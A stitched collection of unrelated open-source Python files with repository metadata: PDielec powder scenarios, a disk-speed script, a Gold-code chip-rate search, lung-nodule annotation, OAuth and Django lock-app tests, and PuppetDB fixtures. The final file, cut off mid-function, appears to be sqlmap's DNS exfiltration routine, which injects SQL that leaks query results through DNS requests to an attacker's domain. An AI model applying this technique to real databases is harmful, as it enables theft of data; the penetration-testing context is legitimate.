tab.settings['Ellipsoid a/b'] = 1.0
tab.settings['Unique direction - h'] = 0
tab.settings['Unique direction - k'] = 0
tab.settings['Unique direction - l'] = 1
tab.settings['Mass or volume fraction'] = 'volume'
tab.settings['ATR material refractive index'] = 4.0
tab.settings['ATR theta'] = 45.0
tab.settings['ATR S polarisation fraction'] = 0.5
tab.settings['Effective medium method'] = 'Bruggeman'
tab.settings['Particle shape'] = 'Sphere'
#
#
self.notebook.addScenario(scenarioType="Powder")
tab = self.notebook.scenarios[4]
tab.settings['Legend'] = 'f=0.4'
tab.settings['Scenario type'] = 'Powder'
tab.settings['Matrix'] = 'ptfe'
tab.settings['Matrix density'] = 2.2
tab.settings['Matrix permittivity'] = 2.0
tab.settings['Bubble radius'] = 30.0
tab.settings['Bubble volume fraction'] = 0.0
tab.settings['Mass fraction'] = 0.5143431083692053
tab.settings['Volume fraction'] = 0.4
tab.settings['Particle size(mu)'] = 0.0001
tab.settings['Particle size distribution sigma(mu)'] = 0.0
tab.settings['Ellipsoid a/b'] = 1.0
tab.settings['Unique direction - h'] = 0
tab.settings['Unique direction - k'] = 0
tab.settings['Unique direction - l'] = 1
tab.settings['Mass or volume fraction'] = 'volume'
tab.settings['ATR material refractive index'] = 4.0
tab.settings['ATR theta'] = 45.0
tab.settings['ATR S polarisation fraction'] = 0.5
tab.settings['Effective medium method'] = 'Bruggeman'
tab.settings['Particle shape'] = 'Sphere'
#
#
self.notebook.addScenario(scenarioType="Powder")
tab = self.notebook.scenarios[5]
tab.settings['Legend'] = 'f=0.5'
tab.settings['Scenario type'] = 'Powder'
tab.settings['Matrix'] = 'ptfe'
tab.settings['Matrix density'] = 2.2
tab.settings['Matrix permittivity'] = 2.0
tab.settings['Bubble radius'] = 30.0
tab.settings['Bubble volume fraction'] = 0.0
tab.settings['Mass fraction'] = 0.613690836374523
tab.settings['Volume fraction'] = 0.49999999999999994
tab.settings['Particle size(mu)'] = 0.0001
tab.settings['Particle size distribution sigma(mu)'] = 0.0
tab.settings['Ellipsoid a/b'] = 1.0
tab.settings['Unique direction - h'] = 0
tab.settings['Unique direction - k'] = 0
tab.settings['Unique direction - l'] = 1
tab.settings['Mass or volume fraction'] = 'volume'
tab.settings['ATR material refractive index'] = 4.0
tab.settings['ATR theta'] = 45.0
tab.settings['ATR S polarisation fraction'] = 0.5
tab.settings['Effective medium method'] = 'Bruggeman'
tab.settings['Particle shape'] = 'Sphere'
#
#
self.notebook.addScenario(scenarioType="Powder")
tab = self.notebook.scenarios[6]
tab.settings['Legend'] = 'f=0.6'
tab.settings['Scenario type'] = 'Powder'
tab.settings['Matrix'] = 'ptfe'
tab.settings['Matrix density'] = 2.2
tab.settings['Matrix permittivity'] = 2.0
tab.settings['Bubble radius'] = 30.0
tab.settings['Bubble volume fraction'] = 0.0
tab.settings['Mass fraction'] = 0.7043956704831009
tab.settings['Volume fraction'] = 0.6
tab.settings['Particle size(mu)'] = 0.0001
tab.settings['Particle size distribution sigma(mu)'] = 0.0
tab.settings['Ellipsoid a/b'] = 1.0
tab.settings['Unique direction - h'] = 0
tab.settings['Unique direction - k'] = 0
tab.settings['Unique direction - l'] = 1
tab.settings['Mass or volume fraction'] = 'volume'
tab.settings['ATR material refractive index'] = 4.0
tab.settings['ATR theta'] = 45.0
tab.settings['ATR S polarisation fraction'] = 0.5
tab.settings['Effective medium method'] = 'Bruggeman'
tab.settings['Particle shape'] = 'Sphere'
#
#
self.notebook.addScenario(scenarioType="Powder")
tab = self.notebook.scenarios[7]
tab.settings['Legend'] = 'f=0.7'
tab.settings['Scenario type'] = 'Powder'
tab.settings['Matrix'] = 'ptfe'
tab.settings['Matrix density'] = 2.2
tab.settings['Matrix permittivity'] = 2.0
tab.settings['Bubble radius'] = 30.0
tab.settings['Bubble volume fraction'] = 0.0
tab.settings['Mass fraction'] = 0.7875384471385155
tab.settings['Volume fraction'] = 0.7
tab.settings['Particle size(mu)'] = 0.0001
tab.settings['Particle size distribution sigma(mu)'] = 0.0
tab.settings['Ellipsoid a/b'] = 1.0
tab.settings['Unique direction - h'] = 0
tab.settings['Unique direction - k'] = 0
tab.settings['Unique direction - l'] = 1
tab.settings['Mass or volume fraction'] = 'volume'
tab.settings['ATR material refractive index'] = 4.0
tab.settings['ATR theta'] = 45.0
tab.settings['ATR S polarisation fraction'] = 0.5
tab.settings['Effective medium method'] = 'Bruggeman'
tab.settings['Particle shape'] = 'Sphere'
#
#
self.notebook.addScenario(scenarioType="Powder")
tab = self.notebook.scenarios[8]
tab.settings['Legend'] = 'f=0.8'
tab.settings['Scenario type'] = 'Powder'
tab.settings['Matrix'] = 'ptfe'
tab.settings['Matrix density'] = 2.2
tab.settings['Matrix permittivity'] = 2.0
tab.settings['Bubble radius'] = 30.0
tab.settings['Bubble volume fraction'] = 0.0
tab.settings['Mass fraction'] = 0.8640269960076986
tab.settings['Volume fraction'] = 0.8
tab.settings['Particle size(mu)'] = 0.0001
tab.settings['Particle size distribution sigma(mu)'] = 0.0
tab.settings['Ellipsoid a/b'] = 1.0
tab.settings['Unique direction - h'] = 0
tab.settings['Unique direction - k'] = 0
tab.settings['Unique direction - l'] = 1
tab.settings['Mass or volume fraction'] = 'volume'
tab.settings['ATR material refractive index'] = 4.0
tab.settings['ATR theta'] = 45.0
tab.settings['ATR S polarisation fraction'] = 0.5
tab.settings['Effective medium method'] = 'Bruggeman'
tab.settings['Particle shape'] = 'Sphere'
#
#
self.notebook.addScenario(scenarioType="Powder")
tab = self.notebook.scenarios[9]
tab.settings['Legend'] = 'f=0.9'
tab.settings['Scenario type'] = 'Powder'
tab.settings['Matrix'] = 'ptfe'
tab.settings['Matrix density'] = 2.2
tab.settings['Matrix permittivity'] = 2.0
tab.settings['Bubble radius'] = 30.0
tab.settings['Bubble volume fraction'] = 0.0
tab.settings['Mass fraction'] = 0.9346294240088532
tab.settings['Volume fraction'] = 0.9000000000000001
tab.settings['Particle size(mu)'] = 0.0001
tab.settings['Particle size distribution sigma(mu)'] = 0.0
tab.settings['Ellipsoid a/b'] = 1.0
tab.settings['Unique direction - h'] = 0
tab.settings['Unique direction - k'] = 0
tab.settings['Unique direction - l'] = 1
tab.settings['Mass or volume fraction'] = 'volume'
tab.settings['ATR material refractive index'] = 4.0
tab.settings['ATR theta'] = 45.0
tab.settings['ATR S polarisation fraction'] = 0.5
tab.settings['Effective medium method'] = 'Bruggeman'
tab.settings['Particle shape'] = 'Sphere'
#
#
tab = self.notebook.analysisTab
tab.settings['Minimum frequency'] = -1
tab.settings['Maximum frequency'] = 400
tab.settings['title'] = 'Analysis'
tab.settings['Covalent radius scaling'] = 1.1
tab.settings['Bonding tolerance'] = 0.1
tab.settings['Bar width'] = 0.5
#
#
tab = self.notebook.viewerTab
tab.settings['Atom scaling'] = 0.5
tab.settings['Maximum displacement'] = 1.0
tab.settings['Bond colour'] = [80, 80, 80, 255]
tab.settings['Bond radius'] = 0.1
tab.settings['Cell colour'] = [255, 0, 0, 255]
tab.settings['Cell radius'] = 0.1
tab.settings['Background colour'] = [120, 120, 120, 255]
tab.settings['Arrow colour'] = [0, 255, 0, 255]
tab.settings['Arrow radius'] = 0.07
tab.settings['Number of phase steps'] = 41
tab.settings['Super Cell'] = [1, 1, 1]
#
#
tab = self.notebook.fitterTab
tab.settings['Excel file name'] = ''
tab.settings['Plot title'] = 'Experimental and Calculated Spectral Comparison'
tab.settings['Fitting type'] = 'Minimise x-correlation'
tab.settings['Number of iterations'] = 20
tab.settings['Frequency scaling factor'] = 1.0
tab.settings['Optimise frequency scaling'] = False
tab.settings['Spectrum scaling'] = False
tab.settings['Spectrum scaling factor'] = 1.0
tab.settings['Independent y-axes'] = True
tab.settings['Spectral difference threshold'] = 0.05
tab.settings['HPFilter lambda'] = 7.0
tab.settings['Baseline removal'] = False
tab.settings['Scenario index'] = 0
#
#
tab = self.notebook.plottingTab
tab.settings['Minimum frequency'] = 0
tab.settings['Maximum frequency'] = 800
tab.settings['Frequency increment'] = 0.2
tab.settings['Molar definition'] = 'Unit cells'
tab.settings['Number of atoms'] = 1
tab.settings['Plot type'] = 'Powder Molar Absorption'
tab.settings['concentration'] = 86.71312720248292
tab.settings['cell concentration'] = 86.71312720248292
|
JohnKendrick/PDielec
|
Examples/Castep/MgO/application_note_bruggeman.py
|
Python
|
mit
| 12,568
|
#!/usr/bin/env python
import time, os, sys
def writetofile(filename,mysize):
mystring = "The quick brown fox jumps over the lazy dog"
writeloops = int(1000000*mysize/len(mystring))
try:
f = open(filename, 'w')
except:
print "Error writing"
raise
for x in range(0, writeloops):
f.write(mystring)
f.close()
os.remove(filename)
##############
def diskspeedmeasure(fileordirname):
filename = 'outputTESTING.txt' # default filename
filesize = 1 # in MB
maxtime = 0.5 # in sec
if os.path.isdir(fileordirname):
filename = os.path.join(fileordirname,filename)
elif os.path.isfile(fileordirname):
filename = fileordirname
else:
filename = fileordirname
start = time.time()
loopcounter = 0
while True:
try:
writetofile(filename, filesize)
except:
print "EERRRROOROROR ... bailing out"
sys.exit(0)
loopcounter += 1
#now = time.time()
diff = time.time() - start
if diff > maxtime: break
return (loopcounter*filesize)/diff
############## Start of main
if __name__ == "__main__":
print "Let's go"
filename = 'outputTESTING.txt' # default filename
if len(sys.argv) >= 2:
arg1 = sys.argv[1]
if os.path.isdir(arg1):
filename = os.path.join(arg1,filename)
elif os.path.isfile(arg1):
filename = arg1
else:
print "Specified argument is not a filename nor a directory. Bailing out"
sys.exit(1)
print "filename", filename
print "Disk writing speed:", diskspeedmeasure(filename), "Mbytes per second"
print "Done"
|
sanderjo/disk-speed
|
diskspeed-dir-or-file-name.py
|
Python
|
gpl-3.0
| 1,485
|
"""Fine-tune the estimated chip rate of a positioning signal."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import argparse
import numpy as np
import scipy.optimize
from thrifty.carrier_sync import DefaultSynchronizer
from thrifty.soa_estimator import SoaEstimator
from thrifty.block_data import card_reader
from thrifty.setting_parsers import metric_float
from thrifty import template_generate
def search(fft, initial_chip_rate, bit_length, code_index, sample_rate):
"""Find the chip rate that yields the maximum correlation peak when the
signal is correlated against the ideal Gold code template."""
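# scipy's Nelder-Mead minimises, so _objective below returns the negated
# correlation peak energy; minimising it maximises the peak.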
def _objective(params):
chip_rate = params[0]
sps = sample_rate / chip_rate
detected, corr_info = _match(fft, sps, bit_length, code_index)
if not detected:
ampl = 0
else:
ampl = -corr_info.energy
print(".. try chip rate {} -> {}".format(chip_rate, -ampl))
return ampl
res = scipy.optimize.minimize(_objective, initial_chip_rate,
method='Nelder-Mead',
options={'xtol': 100, 'disp': True})
return res.x[0]
def _match(fft, sps, bit_length, code_index):
template = template_generate.generate(
bit_length, code_index, sps)
block_history = len(template) - 1
soa_estimate = SoaEstimator(template=template,
thresh_coeffs=(0, 0, 0),
block_len=len(fft),
history_len=block_history)
detected, corr_info, _ = soa_estimate(fft)
return detected, corr_info
def _find_block(blocks, block_id):
for _, block_idx, block in blocks:
if block_idx == block_id:
return block
raise Exception("Could not find block with index {}".format(block_id))
def _plot(fft, chip_rate, bit_length, code_index, sample_rate):
import matplotlib.pyplot as plt
sps = sample_rate / chip_rate
template = template_generate.generate(bit_length, code_index, sps)
detected, corr_info = _match(fft, sps, bit_length, code_index)
assert detected
signal = np.fft.ifft(fft)
start = corr_info.sample
plt.plot(np.abs(signal[start:start+len(template)]))
scaled_template = (template + 1) / 2 * np.max(np.abs(signal)) * 0.9
plt.plot(np.arange(len(template))+corr_info.offset, scaled_template)
plt.savefig('chip_rate_search.pdf', format='pdf')
plt.show()
def _main():
parser = argparse.ArgumentParser(
description=__doc__,
formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument('card_file',
type=argparse.FileType('rb'), default='-',
help="card file with positioning signal to match "
"against.")
parser.add_argument('block_id', type=int,
help="Block within the card file that contains the"
"positioning signal to match against.")
parser.add_argument('sample_rate', type=metric_float,
help="Sample rate that was used to capture the data.")
parser.add_argument('chip_rate', type=metric_float,
help="Estimated chip rate.")
parser.add_argument('bit_length', type=int,
help="Register length of gold code to generate and "
"match.")
parser.add_argument('code_index', nargs='?', type=int, default=0,
help="Index of code within the set of Gold codes of "
"equal length.")
parser.add_argument('-p', '--plot', action="store_true",
help="Plot best fit.")
args = parser.parse_args()
blocks = card_reader(args.card_file)
block = _find_block(blocks, args.block_id)
# Synchronize to carrier. It is assumed that a strong carrier is present.
sps = args.sample_rate / args.chip_rate
carrier_len = int((2**args.bit_length - 1) * sps)
sync = DefaultSynchronizer(thresh_coeffs=(100, 0, 0),
window=None,
block_len=len(block),
carrier_len=carrier_len)
shifted_fft, _ = sync(block)
assert shifted_fft is not None
best = search(fft=shifted_fft,
initial_chip_rate=args.chip_rate,
bit_length=args.bit_length,
code_index=args.code_index,
sample_rate=args.sample_rate)
print("Best chip rate: {}".format(best))
if args.plot:
_plot(shifted_fft, best, args.bit_length,
args.code_index, args.sample_rate)
if __name__ == '__main__':
_main()
|
swkrueger/Thrifty
|
scripts/chip_rate_search.py
|
Python
|
gpl-3.0
| 4,845
|
# -*- coding:utf-8 -*-
import sys
sys.path.append("../luna-data-pre-processing")
import os
from glob import glob
import numpy as np
from math import sqrt
from functools import reduce
from skimage import feature, exposure
import SimpleITK as sitk
from tqdm import tqdm
from NoduleSerializer import NoduleSerializer
import blobs_detection
import plot
# TODO : filter notations with Resnet output
class Notate(object):
# constructor
def __init__(self, dataPath, phase = "deploy", stepSize = 32):
self.dataPath = dataPath
self.phase = phase # test or deploy
self.phaseSubPath = self.phase + "/"
self.stepSize = stepSize
self.serializer = NoduleSerializer(self.dataPath, self.phase)
self.sqrt3 = sqrt(3.0)
# helper
def calcWorldCoord(self, notations, origin):
position = np.array([notations[0], notations[1], notations[2]]) # z, y, x
worldCoord = origin + position
notations[0] = worldCoord[0]
notations[1] = worldCoord[1]
notations[2] = worldCoord[2]
return notations
def calcRadius(self, blob):
# blob is 4D ndarray for 3D image
notation = blob
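# for an n-dimensional Gaussian (DoG) blob the effective radius is
# sqrt(n) * sigma; the volumes here are 3-D, hence sqrt(3)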
notation[3] = self.sqrt3 * notation[3]
return notation
# interface
def notate(self):
csvPath = self.dataPath + self.phaseSubPath + "csv/"
if not os.path.isdir(csvPath):
os.makedirs(csvPath)
with open(csvPath + "annotation.csv", "w") as file:
file.write("seriesuid,coordX,coordY,coordZ,diameter_mm\n")
with open(csvPath + "seriesuids.csv", "w") as file:
file.write("seriesuid\n")
pathList = glob(self.dataPath + self.phaseSubPath + "concat/*.npy")
for path in tqdm(pathList):
filename = os.path.basename(path)
seriesuid = os.path.splitext(filename)[0] # strip only the .npy extension; the uid itself contains dots
print(seriesuid)
data = self.serializer.readFromNpy("concat/", filename)
data = np.squeeze(data)
# notation filter with lung mask
mask = self.serializer.readFromNpy("mask/", filename)
data = data * mask
# blob detection
data = exposure.equalize_hist(data)
blobs = blobs_detection.blob_dog(data, threshold=0.3, min_sigma=self.sqrt3)
# blobs = feature.blob_dog(data, threshold = 0.3)
# blobs = feature.blob_log(data)
# blobs = feature.blob_doh(data)
# get radius of blobs - now we have notation
notations = np.zeros(blobs.shape)
for i in range(len(blobs)):
notations[i] = self.calcRadius(blobs[i])
print(notations)
print(len(notations))
# convert to world coord
mhdFile = os.path.join(self.dataPath, self.phaseSubPath, "raw/", seriesuid + ".mhd")
rawImage = sitk.ReadImage(mhdFile)
worldOrigin = np.array(rawImage.GetOrigin())[::-1]
for i in range(len(notations)):
notations[i] = self.calcWorldCoord(notations[i], worldOrigin)
# append notations to the csv files (headers were written once above)
with open(csvPath + "annotation.csv", "a") as file:
for i in range(len(notations)):
line = "{0},{1},{2},{3},{4}\n".format(seriesuid, notations[i][2], notations[i][1], notations[i][0], notations[i][3] * 2.0)
file.write(line)
with open(csvPath + "seriesuids.csv", "a") as file:
file.write(seriesuid + "\n")
if __name__ == "__main__":
notater = Notate("d:/project/tianchi/data/experiment/", "deploy")
notater.notate()
|
xiedidan/luna-network
|
resnext/filter.py
|
Python
|
gpl-3.0
| 3,970
|
import json
from .oauth import OAuth2Test
class OrbiOAuth2Test(OAuth2Test):
backend_path = 'social_core.backends.orbi.OrbiOAuth2'
user_data_url = 'https://login.orbi.kr/oauth/user/get'
expected_username = 'foobar'
access_token_body = json.dumps({
'access_token': 'foobar',
})
user_data_body = json.dumps({
'username': 'foobar',
'first_name': 'Foo',
'last_name': 'Bar',
'name': 'Foo Bar',
'imin': '100000',
'nick': 'foobar',
'photo': 'http://s3.orbi.kr/data/member/wi/wizetdev_132894975780.jpeg',
'sex': 'M',
'birth': '1973-08-03',
})
def test_login(self):
self.do_login()
def test_partial_pipeline(self):
self.do_partial_pipeline()
|
tobias47n9e/social-core
|
social_core/tests/backends/test_orbi.py
|
Python
|
bsd-3-clause
| 770
|
from django.test import TestCase
from django.urls import reverse
from django.core import mail
from django.contrib.auth.models import User
from securedpi_locks.models import Lock
class RegistrationTestCase(TestCase):
"""Setup Registration test case."""
def setUp(self):
"""Set up for registration test case."""
self.url = reverse('registration_register')
self.get_response = self.client.get(self.url)
self.post_response = self.client.post(
self.url,
{
'username': 'user1',
'email': 'user1@gmail.com',
'password1': 'user1passwordsecret',
'password2': 'user1passwordsecret'
})
def test_access_for_unauth_users_ok(self):
"""Prove that unauth users can access the registration page."""
self.assertEqual(self.get_response.status_code, 200)
def test_registration_page_uses_right_template(self):
"""Assert that registration page is rendered with right template."""
template = 'registration/registration_form.html'
self.assertTemplateUsed(self.get_response, template)
    def test_redirect_after_registered(self):
        """Test redirection from the page on successful registration."""
self.assertEqual(self.post_response.status_code, 302)
    def test_correct_url_on_redirect_after_registered(self):
        """Test redirect URL upon successful registration."""
self.assertEqual(
self.post_response.url,
reverse('registration_complete'))
class EmailTest(TestCase):
"""Set up Email Test Class."""
def test_send_email(self):
"""Tests that registration email was sent."""
mail.send_mail(
"Registration details", "This is the registration message.",
'user@djangoimager.com', ['s@s.com', 'd@s.com'],
fail_silently=False,
)
# Tests that an email was sent
self.assertEqual(len(mail.outbox), 1)
# Verify the subject of the first message is as expected
self.assertEqual(mail.outbox[0].subject, "Registration details")
# Verify the message of the email is as expected
self.assertEqual(
mail.outbox[0].message()._payload,
"This is the registration message.")
# Verify the recipients are as expected
self.assertEqual(mail.outbox[0].to, ['s@s.com', 'd@s.com'])
# Verify the sender is as expected
self.assertEqual(mail.outbox[0].from_email, "user@djangoimager.com")
class LoginPageTestCase(TestCase):
"""Define clas for login page testing."""
def setUp(self):
"""Set up for testing."""
self.url = reverse('auth_login')
self.response = self.client.get(self.url)
def test_access_for_unauth_users(self):
"""Make sure unauth users have access to Login page."""
self.assertEqual(self.response.status_code, 200)
def test_for_registration_button(self):
"""Prove login page contains registration page link."""
reg_url = reverse("registration_register")
expected = 'href="{}"'.format(reg_url)
self.assertContains(self.response, expected)
def test_fields_of_login_form(self):
"""Test that <username> and <password> fields are present."""
        username_field = 'input type="text" name="username"'
        pass_field = 'input type="password" name="password"'
        login_button = "Login"
        expected = [username_field, pass_field]
for field in expected:
self.assertContains(self.response, field)
class LoginLogoutTestCase(TestCase):
"""Define test case for Login/Logout functionality."""
def setUp(self):
"""Set up response for login tests."""
self.user = User(username='test')
self.user.set_password('testpassword&#')
self.user.save()
self.dashboard_url = reverse('dashboard')
self.login_url = reverse('auth_login')
self.logout_url = reverse('auth_logout')
self.bad_login_response = self.client.post(
self.login_url,
{"username": 'wrong', "password": "wrongpassword"}
)
self.login_response = self.client.post(
self.login_url,
{"username": 'test', "password": "testpassword&#"}
)
self.login_response_follow = self.client.post(
self.login_url,
{"username": 'test', "password": "testpassword&#"},
follow=True
)
self.logout_response = self.client.get(self.logout_url)
def test_redirection_after_logged_in(self):
"""Test successful login redirection."""
self.assertEqual(self.login_response.status_code, 302)
def test_redirected_to_dashboard_after_logged_in(self):
"""Prove redirection to the home page after loggin in."""
self.assertEqual(self.login_response.url, self.dashboard_url)
def test_not_redirected_when_failed_login(self):
"""Prove that the user is not redirected if wrong credentials."""
self.assertEqual(self.bad_login_response.status_code, 200)
    def test_logout_successful_redirection(self):
        """Test successful logout redirection."""
self.assertEqual(self.logout_response.status_code, 302)
def test_redirected_to_dashboard_after_logged_out(self):
"""Prove redirection to the home page after loggin out."""
self.assertEqual(self.logout_response.url, self.dashboard_url)
class DashboardViewTestCase(TestCase):
"""Define test class for Dashboard view."""
def setUp(self):
"""Define setup for tests."""
self.user = User(username='test')
self.user.save()
self.client.force_login(user=self.user)
self.lock1 = Lock(
user=self.user,
name='lock1',
location='codefellows',
serial='pi12345')
self.lock1.save()
self.lock2 = Lock(
user=self.user,
name='lock2',
location='codefellows',
serial='pi1234512345')
self.lock2.save()
self.expected1 = 'href="{}"'.format(
reverse('manual_lock', kwargs={'pk': self.lock1.pk, 'action': 'lock'}))
self.expected2 = 'href="{}"'.format(
reverse('manual_unlock', kwargs={'pk': self.lock1.pk, 'action': 'unlock'}))
self.url = reverse('dashboard')
self.response = self.client.get(self.url)
self.template = 'securedpi/dashboard.html'
def test_auth_user_has_access_to_dashboard(self):
"""Prove that response code is 200 for auth users."""
        self.assertEqual(self.response.status_code, 200)
def test_right_template_is_used(self):
"""Prove that right template is used to render page."""
self.assertTemplateUsed(self.response, self.template)
def test_locks_in_context(self):
"""Prove that 'locks' are in response context."""
self.assertIn('locks', self.response.context)
def test_correct_number_of_locks_on_dashboard(self):
"""Prove that correct number of locks renders on the dashboard."""
self.assertEqual(self.response.context['locks'].count(), 2)
def test_username_displayed(self):
"""Make sure correct username is displayed."""
self.assertContains(self.response, 'test')
def test_expected_links_displayed(self):
"""Test thatexpected links and username are displayed."""
urls = [
'profile',
'securedpi_facerec:train',
'auth_logout',
]
for url in urls:
expected_link = 'href="{}"'.format(reverse(url))
self.assertContains(self.response, expected_link)
def test_lock_buttons_present(self):
"""Make sure each lock has <Edit> and <Access Log> buttons present."""
lock_pks = [self.lock1.pk, self.lock2.pk]
for lock_pk in lock_pks:
edit_link = 'href="{}"'.format(reverse('edit_lock', kwargs={'pk': lock_pk}))
log_link = 'href="{}"'.format(reverse('events', kwargs={'pk': lock_pk}))
self.assertContains(self.response, edit_link)
self.assertContains(self.response, log_link)
def test_lock_info_present(self):
"""Make sure all lock have their info displayed."""
locks = [self.lock1, self.lock2]
for lock in locks:
info = [
lock.name,
lock.pk,
lock.serial,
lock.location,
lock.facial_recognition
]
for item in info:
self.assertContains(self.response, item)
def test_buttons_display_if_unlocked(self):
"""
Make sure <Lock> button shows up and <Unlock> doesn't
if the lock.status == 'unlocked'."""
self.lock1.status = 'unlocked'
self.lock1.is_active = True
self.lock1.save()
response = self.client.get(self.url)
self.assertContains(response, 'UNLOCKED')
self.assertContains(response, self.expected1)
self.assertNotContains(response, self.expected2)
def test_buttons_display_if_locked(self):
"""
Make sure <Unlock> button shows up and <Lock> doesn't
if the lock.status == 'locked'."""
self.lock1.status = 'locked'
self.lock1.is_active = True
self.lock1.save()
response = self.client.get(self.url)
self.assertContains(response, 'LOCKED')
self.assertNotContains(response, self.expected1)
self.assertContains(response, self.expected2)
def test_buttons_display_if_pending(self):
"""
Make sure both <Unlock> and <Lock> buttons show up
if the lock.status == 'pending'."""
self.lock1.status = 'pending'
self.lock1.is_active = True
self.lock1.save()
response = self.client.get(self.url)
self.assertContains(response, 'PENDING')
self.assertContains(response, self.expected1)
self.assertContains(response, self.expected2)
def test_buttons_display_if_not_active(self):
"""
Make sure <Unlock> and <Lock> buttons don't show up
if the lock.is_active == False."""
self.lock1.is_active = False
self.lock1.save()
response = self.client.get(self.url)
self.assertContains(response, 'NOT ACTIVE')
self.assertNotContains(response, self.expected1)
self.assertNotContains(response, self.expected2)
|
Secured-Pi/Secured-Pi
|
securedpi/test.py
|
Python
|
mit
| 10,525
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2013 Arcus, Inc.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
"""v4_fixtures.py: These are fixture functions for returning PuppetDB data."""
__author__ = "monkee"
__version__ = "1.0.1"
__maintainer__ = "monk-ee"
__email__ = "magic.monkee.magic@gmail.com"
__status__ = "Development"
def v4():
return {
'/nodes': [
{
'name': 'host1',
'deactivated': None,
'catalog_timestamp': '2013-02-09T21:05:15.663Z',
'facts_timestamp': '2013-02-09T21:05:15.663Z',
'report_timestamp': None
},
{
'name': 'host2',
'deactivated': None,
'catalog_timestamp': '2013-02-09T21:05:15.663Z',
'facts_timestamp': '2013-02-09T21:05:15.663Z',
'report_timestamp': None
}
],
'/nodes/host1': {
'name': 'host1',
'deactivated': None,
'catalog_timestamp': '2013-02-09T21:05:15.663Z',
'facts_timestamp': '2013-02-09T21:05:15.663Z',
'report_timestamp': None
},
'/nodes/host1/facts': [
{
'certname': 'host1',
'name': 'architecture',
'value': 'amd64',
},
{
'certname': 'host1',
'name': 'domain',
'value': 'local',
},
{
'certname': 'host1',
'name': 'ipaddress',
'value': '1.2.3.4',
}
],
'/nodes/host1/facts/architecture': [
{
'certname': 'host1',
'name': 'architecture',
'value': 'amd64',
}
],
'/nodes/host1/resources': [
{
'certname': 'host1',
'parameters': {
'ensure': 'installed',
},
'type': 'Class',
'sourceline': 7,
'sourcefile': '/etc/foo/bar.pp',
'exported': False,
'resource': '1234567890',
},
],
'/nodes/host1/resources/Class': [
{
'certname': 'host1',
'parameters': {
'ensure': 'installed',
},
'type': 'Class',
'sourceline': 7,
'sourcefile': '/etc/foo/bar.pp',
'exported': False,
'resource': '1234567890',
},
],
'/facts': [
{
'certname': 'host1',
'name': 'puppetversion',
'value': '3.2.2',
},
{
'certname': 'host2',
'name': 'puppetversion',
'value': '2.7.10',
}
],
'/facts/ipaddress': [
{
'certname': 'host1',
'name': 'ipaddress',
'value': '10.10.10.11',
},
{
'certname': 'host2',
'name': 'ipaddress',
'value': '10.10.10.12',
}
],
'/facts/kernelversion/3.2.34': [
{
'certname': 'host1',
'name': 'kernelversion',
'value': '3.2.34',
}
],
}
|
monk-ee/puppetdb-python
|
tests/v4_fixtures.py
|
Python
|
mit
| 4,496
|
#!/usr/bin/env python
"""
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
import re
import time
from extra.safe2bin.safe2bin import safecharencode
from lib.core.agent import agent
from lib.core.common import Backend
from lib.core.common import calculateDeltaSeconds
from lib.core.common import dataToStdout
from lib.core.common import decodeHexValue
from lib.core.common import extractRegexResult
from lib.core.common import getSQLSnippet
from lib.core.common import hashDBRetrieve
from lib.core.common import hashDBWrite
from lib.core.common import randomInt
from lib.core.common import randomStr
from lib.core.common import safeStringFormat
from lib.core.common import singleTimeWarnMessage
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import queries
from lib.core.enums import DBMS
from lib.core.settings import DNS_BOUNDARIES_ALPHABET
from lib.core.settings import MAX_DNS_LABEL
from lib.core.settings import PARTIAL_VALUE_MARKER
from lib.core.unescaper import unescaper
from lib.request.connect import Connect as Request
def dnsUse(payload, expression):
"""
Retrieve the output of a SQL query taking advantage of the DNS
resolution mechanism by making request back to attacker's machine.
"""
start = time.time()
retVal = None
count = 0
offset = 1
if conf.dnsName and Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.ORACLE, DBMS.MYSQL, DBMS.PGSQL):
output = hashDBRetrieve(expression, checkConf=True)
if output and PARTIAL_VALUE_MARKER in output or kb.dnsTest is None:
output = None
if output is None:
kb.dnsMode = True
while True:
count += 1
prefix, suffix = ("%s" % randomStr(length=3, alphabet=DNS_BOUNDARIES_ALPHABET) for _ in xrange(2))
chunk_length = MAX_DNS_LABEL / 2 if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.MYSQL, DBMS.PGSQL) else MAX_DNS_LABEL / 4 - 2
_, _, _, _, _, _, fieldToCastStr, _ = agent.getFields(expression)
nulledCastedField = agent.nullAndCastField(fieldToCastStr)
nulledCastedField = queries[Backend.getIdentifiedDbms()].substring.query % (nulledCastedField, offset, chunk_length)
nulledCastedField = agent.hexConvertField(nulledCastedField)
expressionReplaced = expression.replace(fieldToCastStr, nulledCastedField, 1)
expressionRequest = getSQLSnippet(Backend.getIdentifiedDbms(), "dns_request", PREFIX=prefix, QUERY=expressionReplaced, SUFFIX=suffix, DOMAIN=conf.dnsName)
expressionUnescaped = unescaper.escape(expressionRequest)
if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.PGSQL):
query = agent.prefixQuery("; %s" % expressionUnescaped)
query = agent.suffixQuery(query)
forgedPayload = agent.payload(newValue=query)
else:
forgedPayload = safeStringFormat(payload, (expressionUnescaped, randomInt(1), randomInt(3)))
Request.queryPage(forgedPayload, content=False, noteResponseTime=False, raise404=False)
_ = conf.dnsServer.pop(prefix, suffix)
